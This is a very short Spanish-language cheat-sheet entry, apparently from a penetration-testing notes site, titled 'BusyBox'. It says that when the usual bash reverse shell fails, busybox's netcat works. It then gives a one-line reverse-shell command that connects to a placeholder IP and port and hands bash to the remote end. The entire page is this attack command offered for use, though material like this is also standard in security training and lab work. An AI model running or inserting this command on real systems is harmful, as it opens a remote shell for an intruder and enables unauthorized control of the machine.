# BusyBox

{% hint style="info" %}
Si la típica `reverse shell` de `bash` falla, usa `busybox` con `netcat`
{% endhint %}

```sh
busybox nc <IP> <PORT> -e bash
```
